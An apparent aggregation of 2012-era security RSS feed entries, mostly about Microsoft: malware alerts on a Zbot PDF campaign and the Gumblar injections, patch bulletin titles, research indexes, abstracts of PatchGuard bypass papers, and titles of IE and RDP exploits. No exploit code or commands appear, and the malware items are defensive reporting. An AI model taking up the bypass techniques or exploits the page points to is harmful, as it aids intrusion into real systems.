http://rgaucher.info/feed/rss2 This is the question that is raising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but i'm just wondering how possible is it for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner. Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First of, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc. Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is not business like interference in the process...

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Microsoft Forefront Threat Management Gateway- Voted WindowSecurity.com Readers' Choice Award Winner - Firewall Software

http://rss.windowsecurity.com/ Microsoft Forefront Threat Management Gateway was selected the winner in the Firewall Software category of the WindowSecurity.com Readers' Choice Awards. Check Point VPN-1 UTM and McAfee Firewall Enterprise were runner-up and second runner-up respectively.

==> Accessing Active Directory Information with LDP

http://rss.windowsecurity.com/ In this article, the author will expose some security issues related to LDAP and Active Directory, using a free Microsoft tool called LDP.exe

==> Video: Security Compliance Manager 2.5: Understanding Baselines

http://rss.windowsecurity.com/ This video introduces Microsoft Security Compliance Manager 2.5 and explains the concept of baselines.

==> Malicious Web Site / Malicious Code: New Zbot campaign comes in a PDF

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs has received several reports of a Zbot trojan campaign spreading via email. We have seen over 2200 messages so far. Zbot (also known as Zeus) is an information stealing trojan (infostealer) collecting confidential data from each infected computer. The main vector for spreading Zbot is a spam campaign where recipients are tricked into opening infected attachments on their computer. This new variant uses a malicious PDF file which contains the threat as an embedded file. When recipients open the PDF, it asks to save a PDF file called Royal_Mail_Delivery_Notice.pdf. The user falsely assumes that the file is just a PDF, and therefore safe to store on the local computer. The file, however, is really a Windows executable. The malicious PDF launches the dropped file, taking control of the computer. At time of writing this file has a 20% anti-virus detection rate (SHA1 : f1ff07104b7c6a08e06bededd57789e776098b1f). The threat creates a subdirectory under %SYSTEM32% with the name "lowsec" and drops the "local.ds" and "user.ds" files. These are configuration files for the threat. It also copies itself into %SYSTEM32% as "sdra64.exe" and modifies the registry entry "%SOFTWARE%\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" to launch itself during system startup. When it runs, it injects malicious code into the Winlogon.exe instance in memory. This Zbot variant connects to malicious remote sever in China using an IP address of 59.44.[removed].[removed]:6010. Screen shot of the email message: Saves the malicious embedded file Adobe Acrobat Reader shows a warning about launching the file: The problem lies deep inside the PDF file format. This technique is similar, but not the same, as explained in this blog post. Update: In addition to the Royal Mail emails we have also seen emails that look like they are coming from Canada Post. These are primarily being sent to email addresses in the .ca domain space. See below for a screenshot. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Microsoft's Ninemsn Australia Web Site Compromised

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected that the ninemsn support Web site (ninemsn.com.au) has been compromised and injected with malicious code. The malicious code was identified to be part of the Gumblar mass injections, and the injected code is hidden deep within the ninemsn ad engine, served on request. The injected code leads to a site that has also been compromised by Gumblar. The compromised code is hidden specifically within the "Women's Weekly" banner script. Other ad banners are not affected. Screenshot of the Web site: Screenshot of the ad element: At this time, the malicious code isn't available or reachable, but this could change at any time. An interesting implication is that this ad can be dynamically served on multiple Web pages within ninemsn. This is unlike a typical injection where Web sites are compromised in a single static page; in this case, the infected banner ad can be pulled to various locations within the site, serving its malicious purpose silently. Ninemsn, a joint venture between PBL Media and Microsoft, is one of the most visited portal Web sites (Alexa traffic rank 573) delivering online and mobile content, news, information, entertainment, and social networking capabilities. We contacted Microsoft when we discovered the attack and the ad banner has now been removed from the ninemsn support Web site. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects. Papers and Posts ------------ * FireStarter: Agile Development and Security * Comments on Microsoft Simplified SDL * Rock Beats Scissors, and People Beat Process * FireStarter: Secure Development Lifecycle – You’re Doing It Wrong * Structured Security Program, Meet Agile Process * FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure * Are Secure Web Apps Possible? * Clickjacking Details, Analysis, and Advice Presentations --------- Security + Agile = FAIL Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic. Vendors --- We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits. * Cigital * HP (SpiDynamics, Fortify) * IBM (Ounce) * Veracode * WhiteHat Security

==> Encryption

http://securosis.com/feeds/research Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution. 2. Your Simple Guide to Endpoint Encryption. 3. Post on the Three Laws of Data Encryption. 4. Format and Datatype Preserving Encryption 5. Post on When to Layer Encryption. 6. Application vs. Database Encryption. 7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats. 8. The Data Security Lifecycle covers encryption during the movement and storage of data. General Coverage ------------ 1. Tokenization Will Become the Dominant Payment Transaction Architecture 2. Visa’s Data Field Encryption 3. Boaz Nails It- The Encryption Dilemma 4. “PIN Crackers” and Data Security, looking at attacks on encryption. 5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security. 6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission. 7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection. Presentations --------- * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * This presentation is on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you if should you should start looking for tools. Please email info@securosis.com if you have any additions or corrections.
Enterprise/General Encryption Providers * Certicom. * CheckPoint. * Entrust. * GuardianEdge. * IBM. * nuBridges. * Prime Factors Inc. * RSA. * SafeNet. * Sophos (Utimaco). * Symantec (PGP). * Thales (nCipher) * TruCrypt. * Venafi. * Voltage. * Vormetric. * WinMagic. Endpoint Encryption Vendors * beCrypt. * Credant. * DESLock. * McAfee (SafeBoot). * Microsoft (BitLocker). * Namo. * Secude. * Secuware. Database Encryption Vendors * IBM. * NetLib. * Oracle. * Relational Wizards. * RSA (Valyd). * SafeNet (Ingrian). * Sybase. * Thales (nCipher). * Voltage. * Vormetric. Key Management, Certificate and other tools * Entrust. * Prime Factors Inc. * RSA * Symantec (Verisign). * Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this week need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks. Papers and Posts ------------ * Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete. * Securing the Cloud with Virtual Private Storage. * How The Cloud Destroys Everything I Love about Web Application Security. Presentations --------- * Understanding Cloud Security in 30 Minutes or Less! Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Effectiveness of Microsoft Office File Validation

http://www.cert.org/blogs/vuls/rss.xml Microsoft recently released a component for Office called Office File Validation that is supposed to help protect against attacks using malformed files. Because I recently performed file fuzzing tests on Microsoft Office, I decided to test the effectiveness of Office File Validation.

==> A Security Comparison: Microsoft Office vs. Oracle Openoffice

http://www.cert.org/blogs/vuls/rss.xml Recently, Dan Kaminsky published a blog entry that compared the fuzzing resiliency of Microsoft Office and Oracle OpenOffice. This blog entry contains the results from a similar test that I performed in November 2010. Also included are some other aspects of the Office suites that can affect the software's security.

==> Default ‘Do Not Track’ Is Best Choice for Internet Explorer 10 Users

http://www.eweek.com/rss-feeds-45.xml Advertisers that are fighting Microsofts decision to set the Internet Explorer 10 browser setting by default to Do Not Track should understand that theres a way to get their message out without intruding on users privacy.

==> Microsoft Says 6,000 Jobs Open, Wants More Visas

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft says it can't find enough skilled IT workers to fill open positions, but critics say the company is merely trying to justify hiring foreigners.

==> Advertisers' 'Do Not Track' Protests Fail Smell Test

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN An almost comic war of words continues between advertisers and Microsoft regarding do not track technology in Internet Explorer 10. Funny thing: The only tracking option advertisers want is opt-out. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Search for free software quickly becoming top online security threat

http://www.infosecurity-magazine.com/rss/news/ The latest Security Intelligence Report from Microsoft highlights a threat that has skyrocketed to the top of its list of greatest concerns in a relatively short period of time. In end-users relentless search for free software activation keys, many are ending up with more than just what they perceive as a bargain

==> Two-thirds of Bing users exposed to malicious links

http://www.infosecurity-magazine.com/rss/news/ Looking for celebrity gossip on Bing? Think twice: nearly two-thirds of search results on Microsofts search engine contain malicious links. Thats compared to the still-alarming 30% for Google.

==> RSA Europe 2012: Microsoft offers free cloud security assessment

http://www.infosecurity-magazine.com/rss/news/ In response to a recent independent study on cloud computing commissioned by Microsoft, the company took the wraps off a free online tool that helps organizations determine their security readiness to adopt cloud services

==> 25 critical updates in Adobe Flash fix

http://www.infosecurity-magazine.com/rss/news/ Just slightly out of kilter with todays Microsoft Patch Tuesday, Adobe yesterday issued a patch for 25 Flash vulnerabilities (14 buffer overflows and 11 memory corruption flaws), and another patch for Adobe AIR.

==> Microsoft will reject ‘weak’ digital certificates from tomorrow

http://www.infosecurity-magazine.com/rss/news/ A weak digital certificate is defined as one signed with an RSA key of less than 1024 bits. Since it is now generally accepted that keys of a lesser length can be brute-forced with modern computing power, Microsoft is upping the ante by forcing a move to a stronger key length.

==> Microsoft buys authentication firm PhoneFactor

http://www.infosecurity-magazine.com/rss/news/ Microsoft has bought the multi-factor authentication (MFA) company PhoneFactor. Financial terms of the deal have not been released. PhoneFactor will largely continue as is until its products are onboarded into the Microsoft Volume Licensing programs.

==> October Patch Tuesday preview

http://www.infosecurity-magazine.com/rss/news/ After a very light September, Octobers Patch Tuesday will revert to normal with seven security bulletins from Microsoft: one labeled critical and six labeled important.

==> Microsoft settles 3322.org Nitol botnet case

http://www.infosecurity-magazine.com/rss/news/ Microsofts takedown of the 3322.org Chinese website, in an effort to limit the promulgation of the Nitol botnot, has yielded a settlement. Website owner Peng Yong has agreed to cooperate with Microsoft and the Chinese Computer Emergency Response Team (CN-CERT) to block all malicious connections to the domain, working to actively prevent malware infections.

==> Microsoft faces $7 billion fine by EU

http://www.infosecurity-magazine.com/rss/news/ Microsoft will be fined for failing to comply with a 2009 ruling from the EU, which had objected to the way the company was using its dominant operating system position to the advantage of its own browser.

==> Microsoft Patches Windows, Office Flaws

http://www.krebsonsecurity.com/feed/ Microsoft today pushed out seven updates to fix a variety of security issues in Windows, Microsoft Office and other software. If you’re using Windows, take a moment to check with Windows Update or Automatic Update to see if new security patches are available. Most of the vulnerabilities addressed in this month’s patch batch apply to [...]

==> In a Zero-Day World, It’s Active Attacks that Matter

http://www.krebsonsecurity.com/feed/ The recent zero-day vulnerability in Internet Explorer caused many (present company included) to urge Internet users to consider surfing the Web with a different browser until Microsoft issued a patch. Microsoft did so last month, but not before experts who ought to have known better began downplaying such advice, pointing out that other browser makers have more vulnerabilities and just as much exposure to zero-day flaws. This post examines hard data that shows why such reasoning is more emotional than factual. Unlike Google Chrome and Mozilla Firefox users, IE users were exposed to active attacks against unpatched, critical vulnerabilities for months at a time over the past year and a half.

==> Microsoft Fixes Zero-Day, Four Other Flaws in IE

http://www.krebsonsecurity.com/feed/ Microsoft has released an emergency update for Internet Explorer that fixes at least five vulnerabilities in the default Web browser on Windows, including a zero-day flaw that miscreants have been using to break into vulnerable systems. The patch, MS12-063, is available through Windows Update or via Automatic Update. If you installed the stopgap "fix it" tool that Microsoft released earlier this week to blunt the threat from the zero-day bug, you need not reverse or remove that fix it before applying this update. The vulnerability resides in IE 7, 8, and 9, on nearly all supported versions of Windows, apart from certain installations of Windows Server 2008 and Windows Server 2012.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> MS12-066 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2741517) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for October 2012 - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-055 - Important : Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-054 - Critical : Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-053 - Critical : Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-070 - Important : Vulnerability in SQL Server Could Allow Elevation of Privilege (2754849) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-068 - Important : Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2724197) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-067 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2742321) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-065 - Important : Vulnerability in Microsoft Works Could Allow Remote Code Execution (2754670) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-064 - Critical : Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2742319) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2661254): Update For Minimum Certificate Key Length - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-035 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777) - Version: 2.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-061 - Important : Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for September 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-062 - Important : Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2736233): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-045 - Critical : Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (2698365) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2728973): Unauthorized Digital Certificates Could Allow Spoofing - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2743314): Unencapsulated MS-CHAP v2 Authentication Could Allow Information Disclosure - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-052 - Critical : Cumulative Security Update for Internet Explorer (2722913) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-057 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-056 - Important : Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution (2706045) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS11-009 - Important : Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure (2475792) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.4

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-024 - Critical : Vulnerability in Windows Could Allow Remote Code Execution (2653956) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-020 - Critical : Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-013 - Critical : Vulnerability in C Run-Time Library Could Allow Remote Code Execution (2654428) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-004 - Critical : Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS11-092 - Critical : Vulnerability in Windows Media Could Allow Remote Code Execution (2648048) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-044 - Critical : Cumulative Security Update for Internet Explorer (2719177) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2719662): Vulnerabilities in Gadgets Could Allow Remote Code Execution - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-051 - Important : Vulnerability in Microsoft Office for Mac Could Allow Elevation of Privilege (2721015) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-049 - Important : Vulnerability in TLS Could Allow Information Disclosure (2655992) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-048 - Important : Vulnerability in Windows Shell Could Allow Remote Code Execution (2691442) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-047 - Important : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2718523) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-046 - Important : Vulnerability in Visual Basic for Applications Could Allow Remote Code Execution (2707960) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2719615): Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community. Especially those dealing with malware analysis and accordingly investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentionally implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public (``PatchGuard 3''). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploit leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from these attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put for sell, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft IE execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 7, 8, 9

==> Microsoft IE 8 execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 8

==> Microsoft Windows RDP PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft Windows RDP Remote Code Execution PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> MS12-004 midiOutPlayNextPolyEvent Heap Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows Media

==> Cyber Security Awareness Month - Day 18 - Vendor Standards: The vSphere Hardening Guide, (Thu, Oct 18th)

